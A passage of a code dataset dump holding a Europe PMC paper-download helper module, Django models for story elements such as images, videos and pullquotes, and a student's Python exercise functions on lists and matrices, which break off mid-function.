\"payload\": payload}\n\n @staticmethod\n def write_or_append_to_csv(df_transposed, name=\"europe_pmc.csv\"):\n \"\"\"Writes the csv file or appends to an existing one\n\n :param df_transposed: dataframe to write\n :param name: Default value = 'europe_pmc.csv')\n\n \"\"\"\n path = os.path.join(str(os.getcwd()), name)\n if os.path.exists(path):\n df_transposed.to_csv(path, mode=\"a\", header=False)\n else:\n df_transposed.to_csv(path)\n\n @staticmethod\n def writexml(directory_url, destination_url, content):\n \"\"\"writes xml to the destination\n\n :param directory_url: directory containg destination\n :param destination_url: path to write the xml to\n :param content: xml content\n\n \"\"\"\n if not os.path.isdir(directory_url):\n os.makedirs(directory_url)\n with open(destination_url, \"wb\") as file_handler:\n file_handler.write(content)\n\n @staticmethod\n def make_dict_for_csv(resultant_dict):\n \"\"\"removes the fields downloaded, pdfdownloaded,csvmade for the resultant_dict\n\n :param resultant_dict: dictionary to remove the fields\n :returns: resultant_dict_for_csv\n\n \"\"\"\n resultant_dict_for_csv = copy.deepcopy(resultant_dict)\n for paper in resultant_dict_for_csv:\n paper_dict = resultant_dict_for_csv[paper]\n if \"downloaded\" in paper_dict:\n paper_dict.pop(\"downloaded\")\n if \"pdfdownloaded\" in paper_dict:\n paper_dict.pop(\"pdfdownloaded\")\n if \"jsondownloaded\" in paper_dict:\n paper_dict.pop(\"jsondownloaded\")\n if \"csvmade\" in paper_dict:\n paper_dict.pop(\"csvmade\")\n if \"htmlmade\" in paper_dict:\n paper_dict.pop(\"htmlmade\")\n return resultant_dict_for_csv\n\n @staticmethod\n def write_content_to_destination(url, destination):\n \"\"\"Writes 
content from url to destination\n\n :param url: Url to get content from\n :param destination: destination to write content to\n\n \"\"\"\n with open(destination, \"wb\") as file:\n response = requests.get(url)\n file.write(response.content)\n\n @staticmethod\n def makejson(path, final_xml_dict):\n \"\"\"Writes json of final_xml_dict to path\n\n :param path: path to write json to\n :param final_xml_dict: python dictionary to make the json from\n\n \"\"\"\n append_write = \"w\"\n with open(path, append_write, encoding=\"utf-8\") as file_handler:\n json.dump(final_xml_dict, file_handler)\n\n @staticmethod\n def clean_dict_for_csv(paperdict):\n \"\"\"Removes the fields pdfdownloaded , jsondownloaded , csvmade from dictionary of paper\n\n :param paperdict: dictionary to remove fields from\n\n \"\"\"\n dict_to_write = dict(paperdict)\n dict_to_write.pop(\"pdfdownloaded\")\n dict_to_write.pop(\"jsondownloaded\")\n dict_to_write.pop(\"csvmade\")\n return dict_to_write\n\n @staticmethod\n def make_dataframe_for_paper_dict(result, return_dict):\n \"\"\"\n\n :param result: \n :param return_dict:\n\n \"\"\"\n dict_for_df = {k: [v] for k, v in return_dict[result].items()}\n df_for_paper = pd.DataFrame(dict_for_df)\n return df_for_paper\n\n @staticmethod\n def conditions_to_download(paperdict):\n \"\"\"Writes the conditions to download pdf, json and csv\n\n :param paperdict: dictionary to write rules for\n\n \"\"\"\n condition_to_down = False\n condition_to_download_pdf = False\n condition_to_download_json = False\n condition_to_download_csv = False\n condition_to_html = False\n if not paperdict[\"downloaded\"]:\n condition_to_down = True\n if not paperdict[\"pdfdownloaded\"]:\n condition_to_download_pdf = True\n if not paperdict[\"jsondownloaded\"]:\n condition_to_download_json = True\n if not paperdict[\"csvmade\"]:\n condition_to_download_csv = True\n if not paperdict[\"htmlmade\"]:\n condition_to_html = True\n return (\n condition_to_down,\n condition_to_download_csv,\n condition_to_download_json,\n condition_to_download_pdf,\n condition_to_html,\n )\n\n @staticmethod\n def make_clickable(link):\n \"\"\"Returns a Html String\n\n :param link: link for href\n\n \"\"\"\n tag_to_return = f'Link'\n if str(link) == \"nan\":\n tag_to_return = \"Not Found\"\n return tag_to_return\n\n def getcitations(self, pmcid, source):\n \"\"\"Gets citations for the paper of pmcid\n\n :param pmcid: pmcid to get the citations\n :param source: source to get the citations from\n :returns: citations xml\n\n \"\"\"\n request_handler = requests.get(\n self.citationurl.format(source=source, pmcid=pmcid)\n )\n return request_handler.content\n\n def getreferences(self, pmcid, source):\n \"\"\"Gets references for the paper of pmcid\n\n :param pmcid: pmcid to get the references\n :param source: source to get the references from\n :returns: references xml\n\n \"\"\"\n request_handler = requests.get(\n self.referencesurl.format(source=source, pmcid=pmcid)\n )\n return request_handler.content\n\n @staticmethod\n def add_scrollbar(text):\n \"\"\"Makes div scrollable\n\n :param text: text to wrap\n\n \"\"\"\n return f'
<div style=\"height: 100px; overflow: auto;\">{text}</div>
'\n\n def make_html_from_dataframe(self, dataframe, url):\n \"\"\"Writes html from pandas dataframe\n\n :param dataframe: Dataframe to make html from\n :param url: URL to write html to\n\n \"\"\"\n dataframe = dataframe.T\n try:\n dataframe = dataframe.drop(columns=[\"full\", \"htmlmade\"])\n except Exception as exception:\n logging.debug(exception)\n if \"htmllinks\" in dataframe:\n try:\n dataframe[\"htmllinks\"] = dataframe[\"htmllinks\"].apply(\n lambda x: self.make_clickable(x)\n )\n except Exception as exception:\n logging.debug(exception)\n if \"pdflinks\" in dataframe:\n try:\n dataframe[\"pdflinks\"] = dataframe[\"pdflinks\"].apply(\n lambda x: self.make_clickable(x)\n )\n except Exception as exception:\n logging.debug(exception)\n try:\n dataframe[\"abstract\"] = dataframe[\"abstract\"].apply(\n lambda x: self.add_scrollbar(x)\n )\n except Exception as exception:\n logging.debug(exception)\n base_html = \"\"\"\n \n \n \n \n \n \n \n \n \n %s\n \n \n \"\"\"\n html = dataframe.to_html(escape=False)\n html_with_pagination = base_html % html\n with open(url, \"w\", encoding=\"utf-8\") as file_handler:\n file_handler.write(html_with_pagination)\n\n def make_html_from_dict(self, dict_to_write_html_from, url):\n \"\"\"Writes html from python dictionary\n\n :param dict_to_write_html_from: dict to make html from\n :param url: URL to write html to\n\n \"\"\"\n df = pd.Series(dict_to_write_html_from).to_frame(\n dict_to_write_html_from[\"full\"][\"pmcid\"]\n )\n self.make_html_from_dataframe(df, url)\n\n def make_references(self, directory_url, paperid, source, referenceurl):\n \"\"\"Downloads the references for the paper with pmcid (paperid) to reference url\n\n :param directory_url: directory containing referenceurl\n :param paperid: pmc id of the paper\n :param source: source to get the citations from\n :param referenceurl: path to write the references to\n\n \"\"\"\n getreferences = self.getreferences(paperid, source)\n self.writexml(directory_url, referenceurl, getreferences)\n\n def make_citations(self, source, citationurl, directory_url, paperid):\n \"\"\"Downloads the citations for the paper with pmcid (paperid) to citation url\n\n :param source: source to get the citations from\n :param citationurl: path to write the citations to\n :param directory_url: directory containing citationurl\n :param paperid: pmc id of the paper\n\n \"\"\"\n getcitations = self.getcitations(paperid, source)\n self.writexml(directory_url, citationurl, getcitations)\n\n @staticmethod\n def readjsondata(path):\n \"\"\"Reads json from path and returns python dictionary\n\n :param path: path to read the json from\n :returns: python dictionary for the json\n\n \"\"\"\n with open(path) as file_handler:\n dict_from_json = json.load(file_handler)\n return dict_from_json\n\n @staticmethod\n def log_making_xml():\n \"\"\"Logs that the xmls are being written\"\"\"\n\n logging.debug(\n \"*/saving xml to per-document directories (CTrees) (D)*/\")\n loggingurl = os.path.join(str(os.getcwd()), \"*\", \"fulltext.xml\")\n logging.info(\"Saving XML files to %s\", loggingurl)\n logging.debug(\"*/Making the Request to get full text xml*/\")\n\n def getxml(self, pmcid):\n \"\"\"Makes a query for the pmcid xml to eupmc rest.\n\n :param pmcid: pmcid of the paper to query for\n :returns: query result\n\n \"\"\"\n request_handler = requests.get(self.xmlurl.format(pmcid=pmcid))\n return request_handler.content\n\n def getsupplementaryfiles(\n self, pmcid, directory_url, destination_url, from_ftp_end_point=False\n ):\n 
\"\"\"Downloads the supplemetary marks for the paper having pmcid\n\n :param pmcid: pmcid to get the supplementary files\n :param directory_url: directory containg destination\n :param destination_url: path to write the supplementary files to\n :param from_ftp_end_point: Default value = False)\n\n \"\"\"\n\n log_key = \"supplementary\"\n if from_ftp_end_point:\n key = \"PMCxxxx\" + pmcid[-3:]\n path = self.zipurl.format(key=key, pmcid=pmcid)\n log_key = \"zip\"\n else:\n path = self.suppurl.format(pmcid=pmcid)\n request_handler = requests.get(path)\n if not os.path.isdir(directory_url):\n os.makedirs(directory_url)\n file_exits = False\n for chunk in request_handler.iter_content(chunk_size=128):\n if len(chunk) > 0:\n file_exits = True\n break\n if file_exits:\n self.extract_zip_files(\n request_handler, destination_url, log_key, pmcid)\n else:\n logging.warning(\"%s files not found for %s\", log_key, pmcid)\n\n def extract_zip_files(self, request_handler, destination_url, log_key, pmcid):\n \"\"\"\n\n :param request_handler: param destination_url:\n :param log_key: param pmcid:\n :param destination_url: param pmcid:\n :param pmcid:\n\n \"\"\"\n try:\n z = zipfile.ZipFile(io.BytesIO(request_handler.content))\n self.check_or_make_directory(destination_url)\n z.extractall(destination_url)\n logging.info(\"Wrote %s files for %s\", log_key, log_key)\n except Exception as exception:\n logging.warning(\"%s files not found for %s\", log_key, pmcid)\n logging.debug(exception)\n\n def make_initial_columns_for_paper_dict(self, key_for_dict, resultant_dict):\n \"\"\"Writes the json and csv for searchvaraible dict\n\n :param key_for_dict: id of the paper for which fields will be created\n :param resultant_dict: dict in which the fields will be created\n :returns: dict with the initial fields created for pmcid\n\n \"\"\"\n resultant_dict[key_for_dict] = {}\n self.add_keys_for_conditions(key_for_dict, resultant_dict)\n return resultant_dict\n\n @staticmethod\n def add_keys_for_conditions(key_for_dict, resultant_dict):\n \"\"\"[summary]\n\n :param key_for_dict: [description]\n :type key_for_dict: [type]\n :param resultant_dict: [description]\n :type resultant_dict: [type]\n \"\"\"\n resultant_dict[key_for_dict][\"downloaded\"] = False\n resultant_dict[key_for_dict][\"pdfdownloaded\"] = False\n resultant_dict[key_for_dict][\"jsondownloaded\"] = False\n resultant_dict[key_for_dict][\"csvmade\"] = False\n resultant_dict[key_for_dict][\"htmlmade\"] = False\n\n def make_csv_for_dict(self, df, return_dict, output_main, output_paper):\n \"\"\"\n\n :param df:\n :param return_dict:\n :param output_main:\n :param output_paper:\n\n \"\"\"\n logging.info(\"Making csv files for metadata at %s\", os.getcwd())\n paper = 0\n self.write_or_append_to_csv(df, output_main)\n dict_to_use = self.make_dict_for_csv(return_dict)\n for result in tqdm(dict_to_use):\n paper += 1\n result_encoded = self.url_encode_id(result)\n url = os.path.join(os.getcwd(), result_encoded, output_paper)\n self.check_or_make_directory(\n os.path.join(os.getcwd(), result_encoded))\n df_for_paper = self.make_dataframe_for_paper_dict(\n result, dict_to_use)\n self.write_or_append_to_csv(df_for_paper, url)\n return_dict[result][\"csvmade\"] = True\n logging.debug(\"Wrote csv files for paper %s\", paper)\n\n def make_html_for_dict(self, df, return_dict, output_main, output_paper):\n \"\"\"\n\n :param df:\n :param return_dict:\n :param output_main:\n :param output_paper:\n\n \"\"\"\n logging.info(\"Making html files for metadata at %s\", os.getcwd())\n 
paper = 0\n htmlurl = os.path.join(os.getcwd(), output_main)\n self.make_html_from_dataframe(df, htmlurl)\n for result in tqdm(return_dict):\n paper += 1\n result_encoded = self.url_encode_id(result)\n url = os.path.join(os.getcwd(), result_encoded, output_paper)\n self.check_or_make_directory(\n os.path.join(os.getcwd(), result_encoded))\n df_for_paper = self.make_dataframe_for_paper_dict(\n result, return_dict)\n self.make_html_from_dataframe(df_for_paper, url)\n return_dict[result][\"htmlmade\"] = True\n logging.debug(\"Wrote xml files for paper %s\", paper)\n\n def make_xml_for_dict(self, return_dict, output_main, output_paper):\n \"\"\"\n\n :param return_dict:\n :param output_main:\n :param output_paper:\n\n \"\"\"\n dict_to_use = self.make_dict_for_csv(return_dict)\n total_xml = dict2xml(dict_to_use, wrap=\"root\", indent=\" \")\n logging.info(\"Making xml files for metadata at %s\", os.getcwd())\n xmlurl = os.path.join(os.getcwd(), output_main)\n with open(xmlurl, \"w\", encoding=\"utf-8\") as file_handler:\n file_handler.write(total_xml)\n paper = 0\n for result in tqdm(dict_to_use):\n paper += 1\n total_xml_of_paper = dict2xml(\n dict_to_use[result], wrap=\"root\", indent=\" \"\n )\n result_encoded = self.url_encode_id(result)\n xmlurl_of_paper = os.path.join(\n os.getcwd(), result_encoded, output_paper)\n\n self.check_or_make_directory(\n os.path.join(os.getcwd(), result_encoded))\n\n with open(xmlurl_of_paper, \"w\", encoding=\"utf-8\") as file_handler:\n file_handler.write(total_xml_of_paper)\n\n logging.debug(\"Wrote xml files for paper %s\", paper)\n\n def handle_creation_of_csv_html_xml(\n self, makecsv, makehtml, makexml, return_dict, name\n ):\n \"\"\"[summary]\n\n :param makecsv: [description]\n :type makecsv: [type]\n :param makehtml: [description]\n :type makehtml: [type]\n :param makexml: [description]\n :type makexml: [type]\n :param return_dict: [description]\n :type return_dict: [type]\n :param name: [description]\n :type name: [type]\n \"\"\"\n dict_to_use = self.make_dict_for_csv(return_dict)\n df = pd.DataFrame.from_dict(dict_to_use)\n if makecsv:\n self.make_csv_for_dict(\n df, return_dict, f\"{name}s.csv\", f\"{name}.csv\")\n if makehtml:\n self.make_html_for_dict(\n df, return_dict, f\"{name}s.html\", f\"{name}.html\")\n if makexml:\n self.make_xml_for_dict(return_dict, f\"{name}s.xml\", f\"{name}.xml\")\n\n @staticmethod\n def url_encode_id(doi_of_paper):\n \"\"\"[summary]\n\n :param doi_of_paper: [description]\n :type doi_of_paper: [type]\n :return: [description]\n :rtype: [type]\n \"\"\"\n url_encoded_doi_of_paper = doi_of_paper.replace(\n \"\\\\\", \"_\").replace(\"/\", \"_\")\n return url_encoded_doi_of_paper\n\n @staticmethod\n def get_version():\n with open(\n os.path.join(os.path.dirname(__file__), \"config.ini\")\n ) as file_handler:\n config_file = file_handler.read()\n config = configparser.RawConfigParser(allow_no_value=True)\n config.read_string(config_file)\n version = config.get(\"pygetpapers\", \"version\")\n return version\n\n @staticmethod\n def make_dict_from_returned_list(total_json_output, key_in_dict):\n \"\"\"[summary]\n\n :param total_json_output: [description]\n :type total_json_output: [type]\n :param key_in_dict: [description]\n :type key_in_dict: [type]\n :return: [description]\n :rtype: [type]\n \"\"\"\n json_return_dict = {}\n for paper in total_json_output:\n json_return_dict[paper[key_in_dict]] = paper\n return json_return_dict\n\n def make_json_files_for_paper(self, returned_dict, key_in_dict, name_of_file):\n 
\"\"\"[summary]\n\n :param returned_dict: [description]\n :type returned_dict: [type]\n :param key_in_dict: [description]\n :type key_in_dict: [type]\n :param name_of_file: [description]\n :type name_of_file: [type]\n \"\"\"\n self.makejson(f\"{name_of_file}s.json\", returned_dict)\n logging.info(\"Wrote metadata file for the query\")\n paper_numer = 0\n logging.info(\"Writing metadata file for the papers at %s\",\n str(os.getcwd()))\n total_dict = returned_dict[\"total_json_output\"]\n for paper in tqdm(total_dict):\n dict_of_paper = total_dict[paper]\n if not dict_of_paper[\"jsondownloaded\"]:\n paper_numer += 1\n doi_of_paper = dict_of_paper[key_in_dict]\n url_encoded_doi_of_paper = self.url_encode_id(doi_of_paper)\n self.check_or_make_directory(url_encoded_doi_of_paper)\n path_to_save_metadata = os.path.join(\n str(os.getcwd()\n ), url_encoded_doi_of_paper, f\"{name_of_file}.json\"\n )\n dict_of_paper[\"jsondownloaded\"] = True\n self.makejson(path_to_save_metadata, dict_of_paper)\n logging.debug(\n \"Wrote metadata file for the paper %s\", paper_numer)\n\n def make_dict_to_return(\n self, cursor_mark, json_return_dict, total_number_of_results, update\n ):\n \"\"\"[summary]\n\n :param cursor_mark: [description]\n :type cursor_mark: [type]\n :param json_return_dict: [description]\n :type json_return_dict: [type]\n :param total_number_of_results: [description]\n :type total_number_of_results: [type]\n :param update: [description]\n :type update: [type]\n :return: [description]\n :rtype: [type]\n \"\"\"\n dict_to_return = {\n \"total_json_output\": json_return_dict,\n \"total_hits\": total_number_of_results,\n \"cursor_mark\": cursor_mark,\n }\n if update:\n dict_to_return[\"total_json_output\"] = update[\"total_json_output\"].update(\n dict_to_return[\"total_json_output\"]\n )\n return dict_to_return\n","sub_path":"pygetpapers/download_tools.py","file_name":"download_tools.py","file_ext":"py","file_size_in_byte":23962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"38537450","text":"\"\"\"Story child elements\"\"\"\n\nimport logging\nimport re\n\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db import models\nfrom django.dispatch import receiver\nfrom django.utils.safestring import mark_safe\nfrom django.utils.translation import ugettext_lazy as _\nfrom model_utils.models import TimeStampedModel\nfrom requests import request\nfrom requests.exceptions import MissingSchema, Timeout\nfrom slugify import Slugify\n\nfrom apps.photo.models import ImageFile\nfrom utils.decorators import cache_memoize\n\nfrom .mixins import MarkupCharField, MarkupModelMixin, TextContent\n\nslugify = Slugify(max_length=50, to_lower=True)\nlogger = logging.getLogger(__name__)\n\nTOP = 'head'\nDEFAULT_IMAGE_SIZE = (1200, 675) # 16:9 ratio\n\n\nclass ElementQuerySet(models.QuerySet):\n def top(self):\n \"\"\" Elements that are placed at the start of the parent article \"\"\"\n return self.published().filter(placement=TOP)\n\n def inline(self):\n \"\"\" Elements that are placed inside the story \"\"\"\n return self.published().exclude(placement=TOP)\n\n def published(self):\n return self.filter(placement__isnull=False)\n\n def unpublished(self):\n return self.filter(placement__isnull=True)\n\n\nclass StoryChild(TimeStampedModel):\n \"\"\" Models that are placed somewhere inside an article \"\"\"\n objects = ElementQuerySet.as_manager()\n\n class Meta:\n abstract = True\n ordering = ['index']\n\n ordering = models.SmallIntegerField(\n 
default=0,\n blank=True,\n null=True,\n help_text=_('Internal order within placement'),\n verbose_name=_('ordering'),\n )\n placement = models.CharField(\n max_length=100,\n default='head',\n blank='true',\n help_text=_('Placement of this element'),\n verbose_name=_('placement'),\n )\n\n index = models.PositiveSmallIntegerField(\n default=0,\n blank=True,\n null=True,\n help_text=_('Leave blank to unpublish'),\n verbose_name=_('index'),\n )\n\n @property\n def top(self):\n return self.placement == TOP\n\n @property\n def published(self):\n return bool(self.placement)\n\n def siblings(self):\n return self.__class__.objects.filter(parent_story=self.parent_story)\n\n\nclass Pullquote(TextContent, StoryChild): # type: ignore\n \"\"\" A quote that is that is pulled out of the content. \"\"\"\n\n parent_story = models.ForeignKey(\n 'Story',\n related_name='pullquotes',\n on_delete=models.CASCADE,\n )\n\n class Meta:\n verbose_name = _('Pullquote')\n verbose_name_plural = _('Pullquotes')\n\n\nclass Aside(TextContent, StoryChild): # type: ignore\n \"\"\" Fact box or other information typically placed in side bar \"\"\"\n parent_story = models.ForeignKey(\n 'Story',\n related_name='asides',\n on_delete=models.CASCADE,\n )\n\n class Meta:\n verbose_name = _('Aside')\n verbose_name_plural = _('Asides')\n\n\nclass InlineHtml(StoryChild):\n \"\"\" Inline html code \"\"\"\n\n parent_story = models.ForeignKey(\n 'Story',\n related_name='inline_html_blocks',\n on_delete=models.CASCADE,\n )\n bodytext_html = models.TextField()\n\n class Meta:\n verbose_name = _('Inline HTML block')\n verbose_name_plural = _('Inline HTML blocks')\n\n def get_html(self):\n \"\"\" Returns text content as html. \"\"\"\n return mark_safe(self.bodytext_html)\n\n\ndef ratio(w, h):\n \"\"\"Calculate ratio as float\"\"\"\n return round(h / w, 4)\n\n\nclass StoryMedia(StoryChild, MarkupModelMixin):\n \"\"\" Video, photo or illustration connected to a story \"\"\"\n\n AUTO_RATIO = 0.0\n\n ASPECT_RATIO_CHOICES = [\n (AUTO_RATIO, _('auto')),\n (ratio(5, 2), _('5:2 landscape')),\n (ratio(2, 1), _('2:1 landscape')),\n (ratio(16, 9), _('16:9 landscape (youtube)')),\n (ratio(3, 2), _('3:2 landscape')),\n (ratio(4, 3), _('4:3 landscape')),\n (ratio(1, 1), _('1:1 square')),\n (ratio(3, 4), _('3:4 portrait')),\n (ratio(2, 3), _('2:3 portrait')),\n (ratio(1, 2), _('1:2 portrait')),\n ]\n\n class Meta:\n abstract = True\n\n caption = MarkupCharField(\n max_length=1000,\n help_text=_('Text explaining the media.'),\n verbose_name=_('caption'),\n )\n\n creditline = MarkupCharField(\n max_length=100,\n help_text=_('Extra information about media attribution and license.'),\n verbose_name=_('credit line'),\n )\n\n size = models.PositiveSmallIntegerField(\n default=1,\n help_text=_('Relative image size.'),\n verbose_name=_('image size'),\n )\n\n aspect_ratio = models.FloatField(\n verbose_name=_('aspect ratio'),\n help_text=_('height / width'),\n choices=ASPECT_RATIO_CHOICES,\n default=AUTO_RATIO,\n )\n\n def original_ratio(self):\n \"\"\" Width:Height ratio of the original media file. 
\"\"\"\n return 2 / 1\n\n def get_height(self, width, height):\n \"\"\" Calculate pixel height based on builtin ratio \"\"\"\n\n if self.aspect_ratio == self.AUTO_RATIO:\n height = height\n else:\n height = width * self.aspect_ratio\n return int(height)\n\n\nclass StoryImage(StoryMedia):\n \"\"\" Photo or illustration connected to a story \"\"\"\n\n class Meta:\n verbose_name = _('Image')\n verbose_name_plural = _('Images')\n unique_together = [('parent_story', 'imagefile')]\n ordering = ['-ordering']\n\n parent_story = models.ForeignKey(\n 'Story',\n related_name='images',\n on_delete=models.CASCADE,\n )\n\n imagefile = models.ForeignKey(\n ImageFile,\n help_text=_('Choose an image by name or upload a new one.'),\n verbose_name=('image file'),\n on_delete=models.CASCADE,\n )\n\n def __str__(self):\n return f'[{self.imagefile}]'\n\n def original_ratio(self):\n try:\n return self.imagefile.full_height / self.imagefile.full_width\n except TypeError:\n logger.warn(\n 'cannot calculate ratio for image %s' % (self.imagefile, )\n )\n return super().original_ratio()\n\n @property\n def filename(self):\n try:\n return str(self.imagefile)\n except ObjectDoesNotExist:\n return '[no image]'\n\n @property\n def small(self):\n return self.imagefile.small\n\n @cache_memoize()\n def large(self):\n return self.imagefile.large.url\n\n @property\n def crop_size(self):\n width, height = DEFAULT_IMAGE_SIZE\n im = self.imagefile\n if self.aspect_ratio == self.AUTO_RATIO:\n if not im.is_photo:\n height = width * self.original_ratio()\n else:\n height = width * self.aspect_ratio\n return int(width), int(height)\n\n @cache_memoize()\n def cropped(self):\n width, height = self.crop_size\n im = self.imagefile\n return im.thumbnail(\n f'{width}x{height}', crop_box=im.get_crop_box(), expand=1\n ).url\n\n\nclass StoryVideo(StoryMedia):\n \"\"\" Video content connected to a story \"\"\"\n\n VIDEO_HOSTS = (\n ('vimeo', _('vimeo')),\n ('youtu', _('youtube')),\n )\n\n class Meta:\n verbose_name = _('Video')\n verbose_name_plural = _('Videos')\n\n parent_story = models.ForeignKey(\n 'Story',\n related_name='videos',\n on_delete=models.CASCADE,\n )\n video_host = models.CharField(\n max_length=20,\n default=VIDEO_HOSTS[0][0],\n choices=VIDEO_HOSTS,\n )\n\n host_video_id = models.CharField(\n max_length=100,\n verbose_name=_('id for video file.'),\n help_text=_(\n 'the part of the url that identifies this particular video'\n )\n )\n\n def embed(self, width=\"100%\", height=\"auto\"):\n \"\"\" Returns html embed code \"\"\"\n if self.video_host == 'vimeo':\n # \n embed_pattern = (\n ''\n )\n elif self.video_host == 'youtu':\n # \n embed_pattern = (\n ''\n )\n else:\n raise Exception('unknown hosting site.')\n\n return embed_pattern.format(\n height=height,\n width=width,\n host_video_id=self.host_video_id,\n )\n\n @property\n def link(self):\n pk = self.host_video_id\n if self.video_host == 'youtu':\n return f'https://www.youtube.com/watch?v={pk}'\n elif self.video_host == 'vimeo':\n return f'https://vimeo.com/{pk}'\n return ''\n\n @classmethod\n def create_from_url(cls, url, parent_story):\n \"\"\" create video object from input url \"\"\"\n\n # url formats:\n # https://www.youtube.com/watch?v=roHl3PJsZPk\n # http://youtu.be/roHl3PJsZPk\n # http://vimeo.com/105149174\n\n def check_link(url, method='head', timeout=2):\n \"\"\" Does a http request to check the status of the url. 
\"\"\"\n # TODO: check_link() er omtrent lik som metode med samme navn i\n # InlineLink\n try:\n status_code = str(\n request(method, url, timeout=timeout).status_code\n )\n except Timeout:\n status_code = 408 # HTTP Timout\n except MissingSchema:\n status_code = 0 # not a HTTP url\n return status_code\n\n for host in cls.VIDEO_HOSTS:\n hostname = host[0]\n if hostname in url:\n video_host = hostname\n break\n else:\n video_host = None\n\n if not check_link(url) == 200:\n # something is wrong with the url?\n return None\n\n id_regex = r'[a-zA-Z0-9]+$'\n host_video_id = re.search(id_regex, url)\n\n try:\n new_video = cls(\n parent_story=parent_story,\n video_host=video_host,\n host_video_id=host_video_id,\n )\n\n new_video.save()\n return new_video\n except Exception as e:\n logger.debug(e)\n return None\n\n\n@receiver(models.signals.post_save)\ndef story_modified(sender, instance, **kwargs):\n if not issubclass(sender, StoryChild):\n return\n from apps.stories.models import Story\n Story.objects.filter(pk=instance.parent_story.pk\n ).update(modified=instance.modified)\n","sub_path":"django/apps/stories/models/storychildren.py","file_name":"storychildren.py","file_ext":"py","file_size_in_byte":11386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"341529735","text":"#coding: utf-8\n##\n#\n# @author : Olga Maslova, Licence DIM, IUT Annecy le Vieux, FRANCE\n# @brief : a set of generic functions for data management\n\n\"\"\"\n# a variable\na=1 # default type : int\n\n# an empty list\nmylist=[]\n\n#a filled list\nmylist2=[1,2,3]\n\n#append to a list\nmylist.append(10)\n\n#a buggy list\nmybuggylist=[1, 'a', \"Hi\"]\n\n#operators\nb=a+2\nmylist_sum=mylist+mylist2\n\"\"\"\n\ndef average_above_zero(input_list):\n\n #init critical variable\n positive_values_sum=0\n positive_values_count=0\n \n first_item=input_list[0]\n \n #compute the average of positive elements of a list\n for item in input_list:\n #select only positive items \n if item>0:\n positive_values_sum+=item\n positive_values_count+=1\n elif item==0:\n print('This value is null:'+str(item))\n raise ValueError('Zero value is not accepted')\n else:\n print('This value is negative:'+str(item)) \n raise ValueError('Negative value is not accepted')\n #compute the final average\n average=float(positive_values_sum)/float(positive_values_count)\n print('Positive elements average is '+str(average))\n return float(average)\n\"\"\" \n#testing average_above_zero function:\nmylist=[1,2,3,4,-7]\nresult= average_above_zero(mylist)\nprint(str(result))\nmessage='The average of positive items of {list_value) is {res}'.format(list_value=mylist,res=result)\nprint(message)\n\"\"\"\n\n \ndef max_value(input_list):\n ##\n # basic function able to return the max value of a list\n # @param input_list: the input list to be scanned\n # @throws an exception (ValueError) on an empty list\n \n #first check if provided list is not empty\n if len(input_list)==0:\n raise ValueError('provided list is empty')\n \n #init max_value and its index\n max_value=input_list[0]\n max_idx=0\n \n \"\"\" \n #generic style : iterate over the range of list indexes\n for idx in range(len(input_list)):\n if max_value idx: \n index_max-=1\n input_list[idx]=input_list[index_max]\n input_list[index_max]=item\n return input_list\n \n\"\"\"\n#Reverse a table : another way\ndef reverse_table(input_list):\n lastidx=len(input_list)\n for idx in range(len(input_list)/2):\n lastidx-=1\n popped=input_list[idx]\n 
input_list[idx]=input_list[lastidx]\n        input_list[lastidx]=popped\n    \n\"\"\"\n\n\"\"\" \n#testing reverse_table\nimport copy\nmylist=[1,5,4,-7]\nlistsave=copy.deepcopy(mylist)\nreverse_table(mylist)\nprint(listsave)\nprint('The reversed list is {newlist}'.format(newlist=mylist))\n\"\"\"\n\n\nimport numpy\nimport time\n\n##Bounding Box\n# calculates the coordinates of the non-zero area in the 2D matrix\n# @param my_mat: the input 2D matrix to be analyzed\n# @throws an exception (ValueError) on an empty matrix, an exception (ValueError) if the matrix does not contain any ones to calculate\n\ndef roi_bbox(my_mat):\n    #first check if the input matrix is of certain size\n    if len(my_mat) == 0:\n        raise ValueError(\"Your matrix is empty!\")\n    \n    #output coordinates matrix\n    bbox_coords=numpy.zeros([4,2],dtype=int)\n    a=len(my_mat)\n    c=0\n    b=len(my_mat[0])\n    d=0\n    #check if there are ones to count\n    item = 1\n    if item in my_mat:\n        print(\"You are ok, continue!\")\n    else: \n        raise ValueError(\"Fill in your matrix first!\")\n    \n    #check every element of myMat \n    for row in range(0,a):\n        for col in range(0,b):\n            item = my_mat[row,col]\n            #if the element is 1, save its index(i,j)\n            if item==1:\n                if row<a:\n                    a=row\n                if row>c:\n                    c=row\n                if col<b:\n                    b=col\n                if col>d:\n                    d=col \n    #populate the coordinates matrix with the values\n    bbox_coords[0]=[a,b] \n    bbox_coords[1]=[a,d] \n    bbox_coords[2]=[c,b] \n    bbox_coords[3]=[c,d] \n    \n    return bbox_coords \n\"\"\"\n##testing roi_bbox\nsize_rows=6\nsize_cols=6\nmyMat=numpy.zeros([size_rows,size_cols], dtype=int)\n#filling the matrix: better way\nmyMat[0:1,4:5]=1\nmyMat[2:4,0:4]=numpy.ones([2,4])\nprint(myMat)\ninit_time=time.time()\nresult_coordinates=roi_bbox(myMat)\nfinish_time=time.time()\nalltime=finish_time-init_time\nprint(result_coordinates)\n\"\"\"\n##Random filling of the matrix\n# fill random K positions with 'X'\n# @param my_mat: the input 2D matrix of type char, K: number of positions to fill \n# @throws an exception (ValueError) on a bad type matrix, an exception (ValueError) on an empty matrix, an exception (ValueError) on negative or superior to matrix's size value of K\ndef random_fill_sparse(my_mat,K): \n    #check if the input matrix is of type char\n    if str(my_mat.dtype)[:2] != '|S' and str(my_mat.dtype)[:2] != '<U':\n        raise ValueError(\"Your matrix is not of type char!\")\n    #check if K is a valid number of cells\n    if K<0 or K> len(my_mat) :\n        raise ValueError(\"Cannot fill negative number of cells or superior of the matrix's size!\")\n    #the size of the array \n    size_array=len(my_mat) \n    #init iteration \n    i = 0\n    while i < K:\n        #draw a random position and fill it with 'X' if it is still free\n        idx_row = numpy.random.randint(0, size_array)\n        idx_col = numpy.random.randint(0, len(my_mat[0]))\n        if my_mat[idx_row, idx_col] != 'X':\n            my_mat[idx_row, idx_col] = 'X'\n            i += 1\n    return my_mat\n\nfrom random import shuffle\n\n##Random integer\n# draws a random integer in the range [0, maxint)\ndef alea(maxint):\n    return numpy.random.randint(0, maxint)\n\n##\n#Illustration of selective sorting (a)\ndef sort_Selective(myList):\n    #check if the input list is not empty\n    if len(myList) == 0:\n        raise ValueError(\"Your list is empty!\")\n    #iterations\n    i = 